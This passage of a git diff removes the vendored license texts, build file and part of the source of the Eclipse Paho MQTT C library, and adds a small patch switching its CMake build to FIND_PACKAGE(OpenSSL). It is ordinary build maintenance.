-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
diff --git a/thirdparty/paho.mqtt.c/epl-v10 b/thirdparty/paho.mqtt.c/epl-v10
deleted file mode 100644
index 79e486c..0000000
--- a/thirdparty/paho.mqtt.c/epl-v10
+++ /dev/null
@@ -1,70 +0,0 @@
-Eclipse Public License - v 1.0
-
-THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
-
-1. DEFINITIONS
-
-"Contribution" means:
-
-a) in the case of the initial Contributor, the initial code and documentation distributed under this Agreement, and
-b) in the case of each subsequent Contributor:
-i) changes to the Program, and
-ii) additions to the Program;
-where such changes and/or additions to the Program originate from and are distributed by that particular Contributor. A Contribution 'originates' from a Contributor if it was added to the Program by such Contributor itself or anyone acting on such Contributor's behalf. Contributions do not include additions to the Program which: (i) are separate modules of software distributed in conjunction with the Program under their own license agreement, and (ii) are not derivative works of the Program.
-"Contributor" means any person or entity that distributes the Program.
-
-"Licensed Patents" mean patent claims licensable by a Contributor which are necessarily infringed by the use or sale of its Contribution alone or when combined with the Program.
-
-"Program" means the Contributions distributed in accordance with this Agreement.
-
-"Recipient" means anyone who receives the Program under this Agreement, including all Contributors.
-
-2. GRANT OF RIGHTS
-
-a) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, distribute and sublicense the Contribution of such Contributor, if any, and such derivative works, in source code and object code form.
-b) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free patent license under Licensed Patents to make, use, sell, offer to sell, import and otherwise transfer the Contribution of such Contributor, if any, in source code and object code form. This patent license shall apply to the combination of the Contribution and the Program if, at the time the Contribution is added by the Contributor, such addition of the Contribution causes such combination to be covered by the Licensed Patents. The patent license shall not apply to any other combinations which include the Contribution. No hardware per se is licensed hereunder.
-c) Recipient understands that although each Contributor grants the licenses to its Contributions set forth herein, no assurances are provided by any Contributor that the Program does not infringe the patent or other intellectual property rights of any other entity. Each Contributor disclaims any liability to Recipient for claims brought by any other entity based on infringement of intellectual property rights or otherwise. As a condition to exercising the rights and licenses granted hereunder, each Recipient hereby assumes sole responsibility to secure any other intellectual property rights needed, if any. For example, if a third party patent license is required to allow Recipient to distribute the Program, it is Recipient's responsibility to acquire that license before distributing the Program.
-d) Each Contributor represents that to its knowledge it has sufficient copyright rights in its Contribution, if any, to grant the copyright license set forth in this Agreement.
-3. REQUIREMENTS
-
-A Contributor may choose to distribute the Program in object code form under its own license agreement, provided that:
-
-a) it complies with the terms and conditions of this Agreement; and
-b) its license agreement:
-i) effectively disclaims on behalf of all Contributors all warranties and conditions, express and implied, including warranties or conditions of title and non-infringement, and implied warranties or conditions of merchantability and fitness for a particular purpose;
-ii) effectively excludes on behalf of all Contributors all liability for damages, including direct, indirect, special, incidental and consequential damages, such as lost profits;
-iii) states that any provisions which differ from this Agreement are offered by that Contributor alone and not by any other party; and
-iv) states that source code for the Program is available from such Contributor, and informs licensees how to obtain it in a reasonable manner on or through a medium customarily used for software exchange.
-When the Program is made available in source code form:
-
-a) it must be made available under this Agreement; and
-b) a copy of this Agreement must be included with each copy of the Program.
-Contributors may not remove or alter any copyright notices contained within the Program.
-
-Each Contributor must identify itself as the originator of its Contribution, if any, in a manner that reasonably allows subsequent Recipients to identify the originator of the Contribution.
-
-4. COMMERCIAL DISTRIBUTION
-
-Commercial distributors of software may accept certain responsibilities with respect to end users, business partners and the like. While this license is intended to facilitate the commercial use of the Program, the Contributor who includes the Program in a commercial product offering should do so in a manner which does not create potential liability for other Contributors. Therefore, if a Contributor includes the Program in a commercial product offering, such Contributor ("Commercial Contributor") hereby agrees to defend and indemnify every other Contributor ("Indemnified Contributor") against any losses, damages and costs (collectively "Losses") arising from claims, lawsuits and other legal actions brought by a third party against the Indemnified Contributor to the extent caused by the acts or omissions of such Commercial Contributor in connection with its distribution of the Program in a commercial product offering. The obligations in this section do not apply to any claims or Losses relating to any actual or alleged intellectual property infringement. In order to qualify, an Indemnified Contributor must: a) promptly notify the Commercial Contributor in writing of such claim, and b) allow the Commercial Contributor to control, and cooperate with the Commercial Contributor in, the defense and any related settlement negotiations. The Indemnified Contributor may participate in any such claim at its own expense.
-
-For example, a Contributor might include the Program in a commercial product offering, Product X. That Contributor is then a Commercial Contributor. If that Commercial Contributor then makes performance claims, or offers warranties related to Product X, those performance claims and warranties are such Commercial Contributor's responsibility alone. Under this section, the Commercial Contributor would have to defend claims against the other Contributors related to those performance claims and warranties, and if a court requires any other Contributor to pay any damages as a result, the Commercial Contributor must pay those damages.
-
-5. NO WARRANTY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each Recipient is solely responsible for determining the appropriateness of using and distributing the Program and assumes all risks associated with its exercise of rights under this Agreement , including but not limited to the risks and costs of program errors, compliance with applicable laws, damage to or loss of data, programs or equipment, and unavailability or interruption of operations.
-
-6. DISCLAIMER OF LIABILITY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
-
-7. GENERAL
-
-If any provision of this Agreement is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this Agreement, and without further action by the parties hereto, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.
-
-If Recipient institutes patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Program itself (excluding combinations of the Program with other software or hardware) infringes such Recipient's patent(s), then such Recipient's rights granted under Section 2(b) shall terminate as of the date such litigation is filed.
-
-All Recipient's rights under this Agreement shall terminate if it fails to comply with any of the material terms or conditions of this Agreement and does not cure such failure in a reasonable period of time after becoming aware of such noncompliance. If all Recipient's rights under this Agreement terminate, Recipient agrees to cease use and distribution of the Program as soon as reasonably practicable. However, Recipient's obligations under this Agreement and any licenses granted by Recipient relating to the Program shall continue and survive.
-
-Everyone is permitted to copy and distribute copies of this Agreement, but in order to avoid inconsistency the Agreement is copyrighted and may only be modified in the following manner. The Agreement Steward reserves the right to publish new versions (including revisions) of this Agreement from time to time. No one other than the Agreement Steward has the right to modify this Agreement. The Eclipse Foundation is the initial Agreement Steward. The Eclipse Foundation may assign the responsibility to serve as the Agreement Steward to a suitable separate entity. Each new version of the Agreement will be given a distinguishing version number. The Program (including Contributions) may always be distributed subject to the version of the Agreement under which it was received. In addition, after a new version of the Agreement is published, Contributor may elect to distribute the Program (including its Contributions) under the new version. Except as expressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights or licenses to the intellectual property of any Contributor under this Agreement, whether expressly, by implication, estoppel or otherwise. All rights in the Program not expressly granted under this Agreement are reserved.
-
-This Agreement is governed by the laws of the State of New York and the intellectual property laws of the United States of America. No party to this Agreement will bring a legal action under this Agreement more than one year after the cause of action arose. Each party waives its rights to a jury trial in any resulting litigation.
diff --git a/thirdparty/paho.mqtt.c/notice.html b/thirdparty/paho.mqtt.c/notice.html
deleted file mode 100644
index f19c483..0000000
--- a/thirdparty/paho.mqtt.c/notice.html
+++ /dev/null
@@ -1,108 +0,0 @@
-<?xml version="1.0" encoding="ISO-8859-1" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
-<title>Eclipse Foundation Software User Agreement</title>
-</head>
-
-<body lang="EN-US">
-<h2>Eclipse Foundation Software User Agreement</h2>
-<p>February 1, 2011</p>
-
-<h3>Usage Of Content</h3>
-
-<p>THE ECLIPSE FOUNDATION MAKES AVAILABLE SOFTWARE, DOCUMENTATION, INFORMATION AND/OR OTHER MATERIALS FOR OPEN SOURCE PROJECTS
-   (COLLECTIVELY &quot;CONTENT&quot;).  USE OF THE CONTENT IS GOVERNED BY THE TERMS AND CONDITIONS OF THIS AGREEMENT AND/OR THE TERMS AND
-   CONDITIONS OF LICENSE AGREEMENTS OR NOTICES INDICATED OR REFERENCED BELOW.  BY USING THE CONTENT, YOU AGREE THAT YOUR USE
-   OF THE CONTENT IS GOVERNED BY THIS AGREEMENT AND/OR THE TERMS AND CONDITIONS OF ANY APPLICABLE LICENSE AGREEMENTS OR
-   NOTICES INDICATED OR REFERENCED BELOW.  IF YOU DO NOT AGREE TO THE TERMS AND CONDITIONS OF THIS AGREEMENT AND THE TERMS AND
-   CONDITIONS OF ANY APPLICABLE LICENSE AGREEMENTS OR NOTICES INDICATED OR REFERENCED BELOW, THEN YOU MAY NOT USE THE CONTENT.</p>
-
-<h3>Applicable Licenses</h3>
-
-<p>Unless otherwise indicated, all Content made available by the Eclipse Foundation is provided to you under the terms and conditions of the Eclipse Public License Version 1.0
-   (&quot;EPL&quot;).  A copy of the EPL is provided with this Content and is also available at <a href="http://www.eclipse.org/legal/epl-v10.html">http://www.eclipse.org/legal/epl-v10.html</a>.
-   For purposes of the EPL, &quot;Program&quot; will mean the Content.</p>
-
-<p>Content includes, but is not limited to, source code, object code, documentation and other files maintained in the Eclipse Foundation source code
-   repository (&quot;Repository&quot;) in software modules (&quot;Modules&quot;) and made available as downloadable archives (&quot;Downloads&quot;).</p>
-
-<ul>
-       <li>Content may be structured and packaged into modules to facilitate delivering, extending, and upgrading the Content.  Typical modules may include plug-ins (&quot;Plug-ins&quot;), plug-in fragments (&quot;Fragments&quot;), and features (&quot;Features&quot;).</li>
-       <li>Each Plug-in or Fragment may be packaged as a sub-directory or JAR (Java&trade; ARchive) in a directory named &quot;plugins&quot;.</li>
-       <li>A Feature is a bundle of one or more Plug-ins and/or Fragments and associated material.  Each Feature may be packaged as a sub-directory in a directory named &quot;features&quot;.  Within a Feature, files named &quot;feature.xml&quot; may contain a list of the names and version numbers of the Plug-ins
-      and/or Fragments associated with that Feature.</li>
-       <li>Features may also include other Features (&quot;Included Features&quot;). Within a Feature, files named &quot;feature.xml&quot; may contain a list of the names and version numbers of Included Features.</li>
-</ul>
-
-<p>The terms and conditions governing Plug-ins and Fragments should be contained in files named &quot;about.html&quot; (&quot;Abouts&quot;). The terms and conditions governing Features and
-Included Features should be contained in files named &quot;license.html&quot; (&quot;Feature Licenses&quot;).  Abouts and Feature Licenses may be located in any directory of a Download or Module
-including, but not limited to the following locations:</p>
-
-<ul>
-       <li>The top-level (root) directory</li>
-       <li>Plug-in and Fragment directories</li>
-       <li>Inside Plug-ins and Fragments packaged as JARs</li>
-       <li>Sub-directories of the directory named &quot;src&quot; of certain Plug-ins</li>
-       <li>Feature directories</li>
-</ul>
-
-<p>Note: if a Feature made available by the Eclipse Foundation is installed using the Provisioning Technology (as defined below), you must agree to a license (&quot;Feature Update License&quot;) during the
-installation process.  If the Feature contains Included Features, the Feature Update License should either provide you with the terms and conditions governing the Included Features or
-inform you where you can locate them.  Feature Update Licenses may be found in the &quot;license&quot; property of files named &quot;feature.properties&quot; found within a Feature.
-Such Abouts, Feature Licenses, and Feature Update Licenses contain the terms and conditions (or references to such terms and conditions) that govern your use of the associated Content in
-that directory.</p>
-
-<p>THE ABOUTS, FEATURE LICENSES, AND FEATURE UPDATE LICENSES MAY REFER TO THE EPL OR OTHER LICENSE AGREEMENTS, NOTICES OR TERMS AND CONDITIONS.  SOME OF THESE
-OTHER LICENSE AGREEMENTS MAY INCLUDE (BUT ARE NOT LIMITED TO):</p>
-
-<ul>
-       <li>Eclipse Distribution License Version 1.0 (available at <a href="http://www.eclipse.org/licenses/edl-v10.html">http://www.eclipse.org/licenses/edl-v1.0.html</a>)</li>
-       <li>Common Public License Version 1.0 (available at <a href="http://www.eclipse.org/legal/cpl-v10.html">http://www.eclipse.org/legal/cpl-v10.html</a>)</li>
-       <li>Apache Software License 1.1 (available at <a href="http://www.apache.org/licenses/LICENSE">http://www.apache.org/licenses/LICENSE</a>)</li>
-       <li>Apache Software License 2.0 (available at <a href="http://www.apache.org/licenses/LICENSE-2.0">http://www.apache.org/licenses/LICENSE-2.0</a>)</li>
-       <li>Metro Link Public License 1.00 (available at <a href="http://www.opengroup.org/openmotif/supporters/metrolink/license.html">http://www.opengroup.org/openmotif/supporters/metrolink/license.html</a>)</li>
-       <li>Mozilla Public License Version 1.1 (available at <a href="http://www.mozilla.org/MPL/MPL-1.1.html">http://www.mozilla.org/MPL/MPL-1.1.html</a>)</li>
-</ul>
-
-<p>IT IS YOUR OBLIGATION TO READ AND ACCEPT ALL SUCH TERMS AND CONDITIONS PRIOR TO USE OF THE CONTENT.  If no About, Feature License, or Feature Update License is provided, please
-contact the Eclipse Foundation to determine what terms and conditions govern that particular Content.</p>
-
-
-<h3>Use of Provisioning Technology</h3>
-
-<p>The Eclipse Foundation makes available provisioning software, examples of which include, but are not limited to, p2 and the Eclipse
-   Update Manager (&quot;Provisioning Technology&quot;) for the purpose of allowing users to install software, documentation, information and/or
-   other materials (collectively &quot;Installable Software&quot;). This capability is provided with the intent of allowing such users to
-   install, extend and update Eclipse-based products. Information about packaging Installable Software is available at <a
-       href="http://eclipse.org/equinox/p2/repository_packaging.html">http://eclipse.org/equinox/p2/repository_packaging.html</a>
-   (&quot;Specification&quot;).</p>
-
-<p>You may use Provisioning Technology to allow other parties to install Installable Software. You shall be responsible for enabling the
-   applicable license agreements relating to the Installable Software to be presented to, and accepted by, the users of the Provisioning Technology
-   in accordance with the Specification. By using Provisioning Technology in such a manner and making it available in accordance with the
-   Specification, you further acknowledge your agreement to, and the acquisition of all necessary rights to permit the following:</p>
-
-<ol>
-       <li>A series of actions may occur (&quot;Provisioning Process&quot;) in which a user may execute the Provisioning Technology
-       on a machine (&quot;Target Machine&quot;) with the intent of installing, extending or updating the functionality of an Eclipse-based
-       product.</li>
-       <li>During the Provisioning Process, the Provisioning Technology may cause third party Installable Software or a portion thereof to be
-       accessed and copied to the Target Machine.</li>
-       <li>Pursuant to the Specification, you will provide to the user the terms and conditions that govern the use of the Installable
-       Software (&quot;Installable Software Agreement&quot;) and such Installable Software Agreement shall be accessed from the Target
-       Machine in accordance with the Specification. Such Installable Software Agreement must inform the user of the terms and conditions that govern
-       the Installable Software and must solicit acceptance by the end user in the manner prescribed in such Installable Software Agreement. Upon such
-       indication of agreement by the user, the provisioning Technology will complete installation of the Installable Software.</li>
-</ol>
-
-<h3>Cryptography</h3>
-
-<p>Content may contain encryption software. The country in which you are currently may have restrictions on the import, possession, and use, and/or re-export to
-   another country, of encryption software. BEFORE using any encryption software, please check the country's laws, regulations and policies concerning the import,
-   possession, or use, and re-export of encryption software, to see if this is permitted.</p>
-
-<p><small>Java and all Java-based trademarks are trademarks of Oracle Corporation in the United States, other countries, or both.</small></p>
-</body>
-</html>
diff --git a/thirdparty/paho.mqtt.c/paho.mqtt.c.patch b/thirdparty/paho.mqtt.c/paho.mqtt.c.patch
new file mode 100644
index 0000000..d37c66c
--- /dev/null
+++ b/thirdparty/paho.mqtt.c/paho.mqtt.c.patch
@@ -0,0 +1,60 @@
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 0ce3649..3981b6b 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -23,7 +23,7 @@ MESSAGE(STATUS "CMake version: " ${CMAKE_VERSION})
+ MESSAGE(STATUS "CMake system name: " ${CMAKE_SYSTEM_NAME})
+ 
+ SET(CMAKE_SCRIPTS "${CMAKE_SOURCE_DIR}/cmake")
+-SET(CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules")
++list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules")
+ 
+ ## build settings
+ SET(PAHO_VERSION_MAJOR 1)
+diff --git a/src/CMakeLists.txt b/src/CMakeLists.txt
+index c57185b..3d0c2c7 100644
+--- a/src/CMakeLists.txt
++++ b/src/CMakeLists.txt
+@@ -101,27 +101,12 @@ INSTALL(FILES MQTTAsync.h MQTTClient.h MQTTClientPersistence.h
+     DESTINATION ${CMAKE_INSTALL_INCLUDEDIR})
+ 
+ IF (PAHO_WITH_SSL)
+-    SET(OPENSSL_SEARCH_PATH "" CACHE PATH "Directory containing OpenSSL libraries and includes")
++    FIND_PACKAGE(OpenSSL REQUIRED)
+ 
+-    IF (${CMAKE_SYSTEM_NAME} STREQUAL "Darwin")
+-      SET(OPENSSL_SEARCH_PATH "/usr/local/opt/openssl")
+-    ENDIF (${CMAKE_SYSTEM_NAME} STREQUAL "Darwin")
+-
+-    IF (WIN32)
+-      SET(OPENSSL_SEARCH_PATH "C:/OpenSSL-Win64")
+-    ENDIF ()
+-
+-    FIND_PATH(OPENSSL_INCLUDE_DIR openssl/ssl.h
+-        HINTS ${OPENSSL_SEARCH_PATH}/include)
+-    FIND_LIBRARY(OPENSSL_LIB NAMES ssl libssl ssleay32
+-        HINTS ${OPENSSL_SEARCH_PATH}/lib ${OPENSSL_SEARCH_PATH}/lib64)
+-    FIND_LIBRARY(OPENSSLCRYPTO_LIB NAMES crypto libcrypto libeay32
+-      	HINTS ${OPENSSL_SEARCH_PATH}/lib ${OPENSSL_SEARCH_PATH}/lib64)
+-
+-    MESSAGE(STATUS "OpenSSL hints: ${OPENSSL_SEARCH_PATH}")
+     MESSAGE(STATUS "OpenSSL headers found at ${OPENSSL_INCLUDE_DIR}")
+-    MESSAGE(STATUS "OpenSSL library found at ${OPENSSL_LIB}")
+-    MESSAGE(STATUS "OpenSSL Crypto library found at ${OPENSSLCRYPTO_LIB}")
++    MESSAGE(STATUS "OpenSSL libraries found at ${OPENSSL_LIBRARIES}")
++    MESSAGE(STATUS "OpenSSL SSL library found at ${OPENSSL_SSL_LIBRARY}")
++    MESSAGE(STATUS "OpenSSL Crypto library found at ${OPENSSL_CRYPTO_LIBRARY}")
+ 
+     INCLUDE_DIRECTORIES(
+         ${OPENSSL_INCLUDE_DIR}
+@@ -135,8 +120,8 @@ IF (PAHO_WITH_SSL)
+     ADD_LIBRARY(paho-mqtt3cs SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTClient.c SSLSocket.c)
+     ADD_LIBRARY(paho-mqtt3as SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTAsync.c SSLSocket.c)
+ 
+-    TARGET_LINK_LIBRARIES(paho-mqtt3cs ${OPENSSL_LIB} ${OPENSSLCRYPTO_LIB} ${LIBS_SYSTEM})
+-    TARGET_LINK_LIBRARIES(paho-mqtt3as ${OPENSSL_LIB} ${OPENSSLCRYPTO_LIB} ${LIBS_SYSTEM})
++    TARGET_LINK_LIBRARIES(paho-mqtt3cs ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
++    TARGET_LINK_LIBRARIES(paho-mqtt3as ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
+     SET_TARGET_PROPERTIES(
+         paho-mqtt3cs paho-mqtt3as PROPERTIES
+         VERSION ${CLIENT_VERSION}
diff --git a/thirdparty/paho.mqtt.c/src/CMakeLists.txt b/thirdparty/paho.mqtt.c/src/CMakeLists.txt
deleted file mode 100644
index b412002..0000000
--- a/thirdparty/paho.mqtt.c/src/CMakeLists.txt
+++ /dev/null
@@ -1,148 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015, 2017 logi.cals GmbH and others
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Rainer Poisel - initial version
-#     Ian Craggs (IBM Corp.) - merge master
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-## compilation/linkage settings
-INCLUDE_DIRECTORIES(
-    .
-    ${CMAKE_BINARY_DIR}
-    )
-
-CONFIGURE_FILE(VersionInfo.h.in
-    ${CMAKE_BINARY_DIR}/VersionInfo.h
-    @ONLY
-    )
-
-SET(common_src
-    MQTTProtocolClient.c
-    Clients.c
-    utf-8.c
-    StackTrace.c
-    MQTTPacket.c
-    MQTTPacketOut.c
-    Messages.c
-    Tree.c
-    Socket.c
-    Log.c
-    MQTTPersistence.c
-    Thread.c
-    MQTTProtocolOut.c
-    MQTTPersistenceDefault.c
-    SocketBuffer.c
-    Heap.c
-    LinkedList.c
-    )
-
-IF (WIN32)
-    SET(LIBS_SYSTEM ws2_32)
-ELSEIF (UNIX)
-    IF(CMAKE_SYSTEM_NAME MATCHES "Linux")
-        SET(LIBS_SYSTEM c dl pthread)
-    ELSEIF (CMAKE_SYSTEM_NAME MATCHES "FreeBSD")
-        SET(LIBS_SYSTEM compat pthread)
-    ELSE()
-        SET(LIBS_SYSTEM c pthread)
-    ENDIF()
-ENDIF()
-
-
-## common compilation for libpaho-mqtt3c and libpaho-mqtt3a
-ADD_LIBRARY(common_obj OBJECT ${common_src})
-SET_PROPERTY(TARGET common_obj PROPERTY POSITION_INDEPENDENT_CODE ON)
-
-ADD_EXECUTABLE(MQTTVersion MQTTVersion.c)
-
-ADD_LIBRARY(paho-mqtt3c SHARED $<TARGET_OBJECTS:common_obj> MQTTClient.c)
-ADD_LIBRARY(paho-mqtt3a SHARED $<TARGET_OBJECTS:common_obj> MQTTAsync.c)
-
-TARGET_LINK_LIBRARIES(paho-mqtt3c ${LIBS_SYSTEM})
-TARGET_LINK_LIBRARIES(paho-mqtt3a ${LIBS_SYSTEM})
-
-TARGET_LINK_LIBRARIES(MQTTVersion paho-mqtt3a paho-mqtt3c ${LIBS_SYSTEM})
-SET_TARGET_PROPERTIES(
-    paho-mqtt3c paho-mqtt3a PROPERTIES
-    VERSION ${CLIENT_VERSION}
-    SOVERSION ${PAHO_VERSION_MAJOR})
-
-INSTALL(TARGETS paho-mqtt3c paho-mqtt3a
-    ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}
-    LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR}
-    RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR})
-INSTALL(TARGETS MQTTVersion
-    RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR})
-
-IF (PAHO_BUILD_STATIC)
-    ADD_LIBRARY(paho-mqtt3c-static STATIC $<TARGET_OBJECTS:common_obj> MQTTClient.c)
-    ADD_LIBRARY(paho-mqtt3a-static STATIC $<TARGET_OBJECTS:common_obj> MQTTAsync.c)
-
-    TARGET_LINK_LIBRARIES(paho-mqtt3c-static ${LIBS_SYSTEM})
-    TARGET_LINK_LIBRARIES(paho-mqtt3a-static ${LIBS_SYSTEM})
-
-    INSTALL(TARGETS paho-mqtt3c-static paho-mqtt3a-static
-        ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR})
-ENDIF()
-
-INSTALL(FILES MQTTAsync.h MQTTClient.h MQTTClientPersistence.h
-    DESTINATION ${CMAKE_INSTALL_INCLUDEDIR})
-
-IF (PAHO_WITH_SSL)
-    MESSAGE(STATUS "OpenSSL headers found at ${OPENSSL_INCLUDE_DIR}")
-    MESSAGE(STATUS "OpenSSL libraries found at ${OPENSSL_LIBRARIES}")
-    MESSAGE(STATUS "OpenSSL Crypto library found at ${OPENSSL_CRYPTO_LIBRARY}")
-    MESSAGE(STATUS "OpenSSL SSL library found at ${OPENSSL_SSL_LIBRARY}")
-
-    INCLUDE_DIRECTORIES(
-        ${OPENSSL_INCLUDE_DIR}
-    )
-
-    ## common compilation for libpaho-mqtt3cs and libpaho-mqtt3as
-    ## Note: SSL libraries must be recompiled due ifdefs
-    ADD_LIBRARY(common_ssl_obj OBJECT ${common_src})
-    SET_PROPERTY(TARGET common_ssl_obj PROPERTY POSITION_INDEPENDENT_CODE ON)
-    SET_PROPERTY(TARGET common_ssl_obj PROPERTY COMPILE_DEFINITIONS "OPENSSL=1")
-    ADD_LIBRARY(paho-mqtt3cs SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTClient.c SSLSocket.c)
-    ADD_LIBRARY(paho-mqtt3as SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTAsync.c SSLSocket.c)
-
-    TARGET_LINK_LIBRARIES(paho-mqtt3cs ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
-    TARGET_LINK_LIBRARIES(paho-mqtt3as ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
-    SET_TARGET_PROPERTIES(
-        paho-mqtt3cs paho-mqtt3as PROPERTIES
-        VERSION ${CLIENT_VERSION}
-        SOVERSION ${PAHO_VERSION_MAJOR}
-        COMPILE_DEFINITIONS "OPENSSL=1")
-    INSTALL(TARGETS paho-mqtt3cs paho-mqtt3as
-        ARCHIVE DESTINATION  ${CMAKE_INSTALL_LIBDIR}
-        LIBRARY DESTINATION  ${CMAKE_INSTALL_LIBDIR}
-        RUNTIME DESTINATION  ${CMAKE_INSTALL_BINDIR})
-
-    IF (PAHO_BUILD_STATIC)
-        ADD_LIBRARY(paho-mqtt3cs-static STATIC $<TARGET_OBJECTS:common_ssl_obj> MQTTClient.c SSLSocket.c)
-        ADD_LIBRARY(paho-mqtt3as-static STATIC $<TARGET_OBJECTS:common_ssl_obj> MQTTAsync.c SSLSocket.c)
-
-        TARGET_LINK_LIBRARIES(paho-mqtt3cs-static ${OPENSSL_LIBRARIES} ${LIBS_SYSTEM})
-        TARGET_LINK_LIBRARIES(paho-mqtt3as-static ${OPENSSL_LIBRARIES} ${LIBS_SYSTEM})
-        SET_TARGET_PROPERTIES(
-        paho-mqtt3cs-static paho-mqtt3as-static PROPERTIES
-        VERSION ${CLIENT_VERSION}
-        SOVERSION ${PAHO_VERSION_MAJOR}
-        COMPILE_DEFINITIONS "OPENSSL=1")
-
-        INSTALL(TARGETS paho-mqtt3cs-static paho-mqtt3as-static
-            ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR})
-    ENDIF()
-ENDIF()
diff --git a/thirdparty/paho.mqtt.c/src/Clients.c b/thirdparty/paho.mqtt.c/src/Clients.c
deleted file mode 100644
index 477d248..0000000
--- a/thirdparty/paho.mqtt.c/src/Clients.c
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - add SSL support
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions which apply to client structures
- * */
-
-
-#include "Clients.h"
-
-#include <string.h>
-#include <stdio.h>
-
-
-/**
- * List callback function for comparing clients by clientid
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int clientIDCompare(void* a, void* b)
-{
-	Clients* client = (Clients*)a;
-	/*printf("comparing clientdIDs %s with %s\n", client->clientID, (char*)b);*/
-	return strcmp(client->clientID, (char*)b) == 0;
-}
-
-
-/**
- * List callback function for comparing clients by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int clientSocketCompare(void* a, void* b)
-{
-	Clients* client = (Clients*)a;
